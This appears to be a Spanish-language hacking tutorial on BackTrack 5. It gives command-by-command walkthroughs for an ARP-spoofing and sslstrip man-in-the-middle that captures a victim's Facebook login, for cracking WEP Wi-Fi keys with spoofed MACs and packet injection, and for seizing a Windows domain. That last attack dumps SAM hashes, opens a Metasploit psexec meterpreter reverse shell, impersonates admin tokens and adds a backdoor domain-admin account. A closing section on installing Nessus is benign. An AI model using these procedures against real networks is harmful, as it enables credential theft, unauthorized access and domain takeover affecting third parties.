Sei sulla pagina 1di 22

Man in the Middle

Contenido
MAN IN THE MIDDLE ......................................................................................................................... 3 HERRAMIENTAS............................................................................................................................. 3 PASOS ........................................................................................................................................... 3 CAPTURAR USUARIOS Y CONTRASEA. .......................................................................................... 5 CRACKEAR LAS REDES WIFI ............................................................................................................ 7 Segunda Opcin ....................................................................................................................... 11 TOMAR CONTROL DE UN DOMINIO EN WINDOWS ...................................................................... 16 Requisitos: ............................................................................................................................... 16 Pasos ....................................................................................................................................... 16 INSTALACIN DE NESSUS EN BACKTRAKC 5 ................................................................................. 17 Registramos nessus ................................................................................................................. 18 Iniciando Nessus: ..................................................................................................................... 19

MAN IN THE MIDDLE


Un ataque man-in-the-middle, Obtiene acceso no autorizado a un recurso con los privilegios necesarios para cambiarlo. Modificar un flujo de datos en una transmisin de red, el atacante debe ser capaz de observar e interceptar mensajes entre las dos vctimas. A continuacin se ilustra un ejemplo despus de haber sido atacado

HERRAMIENTAS Un adaptador o tarjeta de red con capacidad de inyeccin de paquetes. Una red WiFi cercana

Backtrack 5 o Paquetes necesarios sslstrip arpspoof ettercap Ettetcap Es un interceptor/sniffer/registrador para LANs con switch. Soporta direcciones activas y pasivas de varios protocolos, incluso aquellos cifrados, como SSH y HTTPS. Hace posible la inyeccin de datos en una conexin establecida y filtrado al vuelo aun manteniendo la conexin sincronizada gracias a su poder para establecer un Ataque Man-inthe-middle(Spoofing). Muchos modos de sniffing fueron implementados para darnos un conjunto de herramientas poderoso y completo de sniffing. PASOS 1. Permitir a Ettercap intervenir en las conexiones SSL Para a ello editar el archivo etter.conf ubicado en etc

Descomentar las lneas que se muestran a continuacin.

2. Enrutear el trfico Es necesario que la maquine hacker enrute el trfico, que llegue a ella, esto con el objetivo de que la vctima no se quede sin Internet cuando el ataque est en marcha. En Linux, este paso es muy sencillo, para ello debemos buscar un fichero llamado ip_forward que almacena un booleano (0 o distinto) que especifica si nuestro equipo funciona como router o no. Para ello debemos hacer esto, como superusuario. Escribir en el terminal: echo 1 > /proc/sys/net/ipv4/ip_forward 3. Re direccionar las peticiones. A continuacin se debe ejecutar la redireccin de las peticiones del puerto 80 al puerto 10000, que es el puerto por defecto de la aplicacin ssl strip. iptables -t nat -A PREROUTING i wlan0-p tcp -destination-port 80 -j REDIRECT -to-ports 10000 Finalizar en esta terminal. python sslstrip.py -a -k -f La siguiente imagen ilustra los 3 pasos anteriores.

4. Escanear Host activos Abrimos una nueva terminal para realizar un escaneo con nmap, para ver los host que estn activos en la red. nmap -sP ip_router/mascara

Se podr observar los host que estn conectados. En la cual se deber escoger la vctima para el ejemplo que se selecciono la IP: 10.3.11.206, con Gateway: 10.3.0.1

CAPTURAR USUARIOS Y CONTRASEA.


Los siguientes pasos a seguir corresponden para capturar: User y Password de victimas. Especificar Interfaz Se debe especificar la interfaz de red que se usar para realizar el ataque y el objetivo. Ejemplo: Ejemplo: arpspoof i interfaz_de_red t ip_victima ip_router

Ejecutar Ettercap En una nueva terminal iniciar ettercap, para ello escribir en el terminal ettercap -T -q -i interfaz_de_red Ejemplo:

Finalmente la vctima en su navegador teclear, por ejemplo, la pgina de facebook y, obtendr el siguiente resultado.

La vctima, dar clic en Continuar de todos modos, para entrar a su facebook, o a cualquier otra pgina con este tipo de cifrado, y pasar lo siguiente.

La pgina de Facebook aparecer normalmente, sin embargo, se puede observar en la esquina superior derecha que el protocolo https est tachado, indicando que alguien viol ese cifrado. La persona, iniciar sesin, y una vez presionado el botn entrar, ver su pgina de inicio con toda normalidad, sin darse cuenta que ustedes habrn robado sus credenciales, y sew podr observar como se ilustra en la siguiente imagen.

CRACKEAR LAS REDES WIFI


A continuacin se detalla los pasos para crackear cualquier red WIFI con encriptacin WEP activada usando BackTrack. PASOS Paso 1. Debe abrir una ventana de la terminal o consola y escribir el siguiente comando: airmon-ng El comando anterior te dir cul es tu tarjeta inalmbrica, los nombres ms comunes son: wlan0, ra0, eth0 eth1. Paso 2. El siguiente paso es cambiar la MAC de tu ordenador. Para ello debes introducir el siguiente comando:

airmon-ng stop (tarjeta de red) ifconfig (tarjeta de red) down macchanger -mac 00:11:22:33:44:55 (tarjeta de red) airmon-ng start (tarjeta de red)

EJEMPLO Si tu tarjeta de red se llama wlan0, entonces los comandos seran: airmon-ng stop wlan0 ifconfig wlan0 down macchanger -mac 00:11:22:33:44:55 wlan0 airmon-ng start wlan0

Si se llama eth0, entonces sera: airmon-ng stop eth0 ifconfig eth0 down macchanger -mac 00:11:22:33:44:55 eth0 airmon-ng start eth0 Donde quiera que se vea (tarjeta de red) se debe reemplazarlo con el nombre de tu tarjeta de red. Por ejemplo: MAC 00:11:22:33:44:55.

Paso 3. El siguiente comando permitir ver cules son las redes WiFi que hay a tu alrededor. airodump-ng (tarjeta de red) Desplegara una lista con todas las redes inalmbricas alrededor, con los siguientes campos: BSSID (MAC del router que da la seal), PWR (Poder de seal), CHN (Canal en que se encuentra la red), ENC (Es el tipo de encriptacin) y ESSID (Nombre de la red inalmbrica).

Cuando aparezca la red que desea crackear, pulsa Ctrl + C para detener la lista. Resalte la fila perteneciente a la red de inters, y tome nota de dos cosas: su BSSID y su canal (en la columna CH), como se ilustra a continuacin. Es evidente que la red que desea crackear debe tener cifrado WEP (en la columna ENC), no debe tener WPA, ni ninguna otra cosa.

Paso 4. Ahora vamos a ver lo que est pasando con la red que se eligi y capturar esa informacin en un archivo. airodump-ng -c (canal) -w (nombre del archivo) -bssid (bssid) (tarjeta de red) Supongamos que la red que deseas crackear est en canal 1, que deseas nombrar el archivo como prueba y que el bssid es 00:00:00:00:00:00 y que tu tarjeta de red es wlan0, entonces el comando sera: airodump-ng -c 1 -w prueba -bssid 00:00:00:00:00:00 wlan0

Ahora ya esta capturando datos, ahora fjese que hay una columna que dice DATA, estos son los paquetes que lleva capturados, para poder descifrar la clave WEP como mnimo debe capturar unos 20,000 paquetes. Se recomienda 30,000. Ntese que puede ir muy lento, esto significa que ninguna persona est utilizando la red en el momento. Entonces no est generando trfico y te podra llevar demasiado tiempo llegar a los 20,000 paquetes. Por suerte se puede inyectar trfico a la red y para eso es el comando siguiente que se detalla en el paso 6. Paso 5. Abre una nueva ventana de la consola y escribe el siguiente comando: aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (tarjeta de red) a es el bssid de la red que estamos atacando h es la mac falsa que le diste a tu tarjeta de red al principio e es el nombre de la red que estamos atacando

Despus de introducir el comando deberan aparecer 4 lneas de cdigo y la final debe decir que la conexin ha sido exitosa (Association successful), esto significa que estas conectado en capa 2 del router de la red que est atacando. Si por alguna razn no se puede conectar, entonces las causas pueden ser las siguientes:

La red que quiere atacar est muy lejos. La tarjeta de red no puede hacer inyeccin de paquetes. El router que quiere atacar tiene seguridad para evitar este tipo de ataques.

Paso 6. Ahora para inyectarle el trfico introduce el siguiente comando: aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (tarjeta de red) Donde: b es el bssid de la red que estamos atacando. h es la MAC falsa que le dimos a tu tarjeta de red inalmbrica.

Ver que se empezaran a inyectar paquetes, si observa la otra terminal dnde est capturando los paquetes se dar cuenta que la columna de DATA ahora avanzar mucho ms rpido. Dependiendo de la potencia de la red que est atacando este proceso podra tomar algn tiempo. Es cuestin de que deje el ordenador trabajar.

Paso 7. Una vez que haya recopilado datos suficientes, es el momento de la verdad. Abre una tercera ventana de la consola y ejecuta el siguiente comando para recuperar que los datos que hemos recogido: aircrack-ng-b (bssid) (nombre de archivo-01.cap) Aqu el nombre del archivo debe ser el que escribiste ms arriba. Debes ir al escritorio para verlo, es el que tiene la extensin .cap. Si no has recopilado suficientes datos, aircrack presentar un error y te dir que vuelvas a intentarlo con ms datos. Si tienes xito, se ver as:

La clave WEP aparece al lado del mensaje Key Found. Esto significa que la contrasea se ha descifrado. Puedes copiarla y usarla para conectarte a esa red cuando quieras. Segunda Opcin Utilizaremos un programa llamado Gerix Wifi Cracker. El programa se encuentra en:Applications BackTrack Exploitation Tools Wireless Exploitation WLAN Exploitation gerix-wifi-cracker-ng.

Esta es la pantalla principal del programa.

Ahora nos dirigimos a la pestaa Configuration:

Primer paso es iniciar el modo monitor de la tarjeta wireless, para hacer eso pulsamos donde pone: Enable/Disable Monitor Mode. Veremos que nos crea otro interfaz de red llamado mon0. Este es el que utilizaremos para descifrar la clave. El segundo paso es escanear las redes que tenemos alrededor, para eso tenemos que pinchar en Scan Networks.

Observamos cmo nos aparecen varias redes, ponemos en primer lugar la red objetivo. Ahora que ya tenemos la red escogida nos dirigimos a la pestaa WEP, aqu tenemos que escoger la opcin: Start Sniffing and Logging.

Veremos cmo se nos abre un terminal con la red a la que nos queremos asociar. El siguiente paso es autenticarnos para realizar el ataque. Para eso nos tenemos que dirigir aWEP Attacks (with clients) y pulsar en Associate with AP using fake auth.

Observamos que en la columna AUTH pone OPN. Eso significa que la autenticacin se ha realizado con xito. A continuacin realizaremos un ataque a la red escogida, para eso pulsamos en ARP request replay.

Veremos cmo se abre otra terminal (la de la izquierda en la imagen). Esta terminal es la que inyecta paquetes, para poder descifrar la clave necesitamos que el nmero de #Data de la terminal de la derecha aumente, podemos intentar averiguar la clave a partir de las 5000 #Data, aunque no hay un nmero exacto, todo depende de la longitud de la clave. Cuando tengamos suficientes #Data nos dirigimos a la pestaa Cracking y pulsamos enAircrack-ng Decrypt WEP password. Si tenemos xito nos saldr la siguiente pantalla:

TOMAR CONTROL DE UN DOMINIO EN WINDOWS Los dominios en Windows, facilitan muchas de las tareas a la hora de administrar una red, ya que permite realizar una agrupacin lgica de servidores de red y otros ordenadores, para compartir informacin comn sobre cuentas y seguridad, pero es una prctica muy comn (aunque poco recomendada) que los administradores de estos dominios reutilicen la clave que usan para el usuario administrador de un equipo en los dominios de Windows.

Requisitos:

Tener acceso a una maquina miembro del dominio (para sacar el hash del usuario) Todos los usuarios administrador de las maquinas miembros del dominio tienen la misma clave Conocer la ip desde la que se loguea el administrador del dominio (puedes conseguirla de muchas formas, una de ellas es la ing. social) Una copia de BackTrack

Pasos

mount /dev/sda1 /mnt/sda1 Montamos la particion de la maquina Windows cd /mnt/sda1/WINDOWS/system32/config accedemos a la carpeta dodne se encuentra el archivo SAM samdump2 system SAM sacamos los hash de los usuarios en la maquina Windows msfconsole ejecutamos el metasploit por consola

use windows/smb/psexec utilizamos el psexec exploit -p windows/meterpreter/reverse_tcp -o utilizamos la shell meterpreter LHOST=192.168.1.160,LPORT=6789,RHOST=192.168.1.23,SMBUser=Administrator,S MBPass= 123:5654 -j configuramos las opciones del exploit sessions -i 1 una vez aparezca exitoso el ataque lanzamos la sesin donde se encuentra use incognito utilizamos el modulo incognito de meterpreter list_tokens -u mostramos los tokens impersonate_token mydomain\\domainadmin tomamos las credenciales del administrador de dominio execute -f cmd.exe -i -t lanzamos la consola de Windows net user hack MPass5678 /add /domain Agregamos el usuario hack con clave MPass46782 al dominio net group Domain Admins hack /add /domain metemos el usuario hack al grupo de administradores de dominio Ya hemos tomado el control del dominio de windows Este ataque es compatible con WinXP/Vista/Win7/Windows Server2k3/Windows Server 2k7 y muestra lo sensible que es reutilizar las contraseas en nuestro sistema, sin importar que tan complejas sean.

INSTALACIN DE NESSUS EN BACKTRAKC 5 Nessus es una aplicacin para el escaneo de vulnerabilidades, una herramienta indispensable para auditorias de seguridad informtica, Disponible para Linux, Windows, BSD, Mac OS X y Solaris. En este artculo veremos los pasos para instalar Nessus 4.4 .1 en Backtrack 5, los mismos pasos sirven para instalarlo en Ubuntu o Debian. Ingresamos a http://www.tenable.com/download/ y seleccionamos la plataforma linux, luego aceptamos los trminos de la licencia para acceder a las opciones de descarga en donde seleccionaremos la versin de nessus para nuestro sistema operativo. En este caso descargaremos la versin para Ubuntu 10.04

Luego abrimos una Terminal, ubicamos la ruta donde descargamos el archivo y ejecutamos: sudo dpkg -i Nessus-4.4.1-ubuntu910_i386.deb Luego vamos a crear el usuario para administrar Nessus, ejecutamos: /opt/nessus/sbin/nessus-adduser Ingresamos el Login (usuario) el password con su confirmacin y habilitamos el usuario como administrador de Nessus, debemos ver algo como esto:

Registramos nessus Debemos registrarnos en el sitio de Nessus, puedes hacerlo siguiendo este enlace http://www.tenable.com/register/, Ingresamos a la opcin HomeFeed, la cual es gratuita para uso personal.

Diligenciamos el formulario, luego recibiremos un cdigo en la cuenta de correo registrada.

En la terminal ejecutamos: sudo /opt/nessus/bin/nessus-fetch register XXXX-XXXX-XXXX-XXXX-XXXX Nota: Reemplaza las XXXX por el cdigo de registro Si todo sale bien recibiras el siguiente mensaje: Your activation code has been registered properly - thank you. Luego del registro comenzar la actualizacin de los plugins de nessus, no canceles el proceso, aunque no muestra nada espera hasta que salga algo como esto.

Iniciando Nessus: Luego de que se instalen los plugins vamos a iniciar el servicio de nessus, ejecutamos el comando: /etc/init.d/nessusd start Verificando el puerto

Para verificar que nessus se est ejecutando colocamos el comando: netstat -ntpl | grep nessusd

Debemos verificar que nessus se encuentre corriendo en el puerto 8834. Si esto es correcto ingresamos con nuestro navegador web a https://localhost:8834

Integrando Nessus con Metasploit Ejecutamos metasploit en nuestra consola cd /etc/pentest/framework3 msfconsole

Cargamos el mdulo nessus desde metasploit con el comando load nessus

Nos conectamos a nuestro nessus con las credenciales configuradas en los pasos anteriores, ejecutamos: nessus_connect usuario:password@127.0.0.1 ok Donde usuario es el usuario que configuramos en la instalacin de nessus y el password correspondiente. Si los datos son correctos debemos recibir el siguiente mensaje.

Ahora podemos lanzar un escaneo con nessus desde metasploit, primero debemos verificar las polticas disponibles o crear una desde la interfaz web de nessus. Para listar las politicas ejecutamos nessus_polycy_list

Para crear un escaneo ejecutamos nessus_scan_new -idPolicy NombreEscaneo host o red Ejemplo:

En este caso lanzamos un escaneo llamado Escaneo2 utilizando la poltica 1 hacia la red 192.168.0.0/24 , luego con el comando nessus_report_list generamos un reporte de los escaneos ejecutados.

Copiamos el ID del escaneo realizado y podemos sacar un reporte de los hosts y el nmero de vulnerabilidades encontradas.

Una vez identificados los host vamos a realizar un reporte del host que nos interese, para eso ejecutamos: nessus_report_host_ports <hostname> <report id>

Potrebbero piacerti anche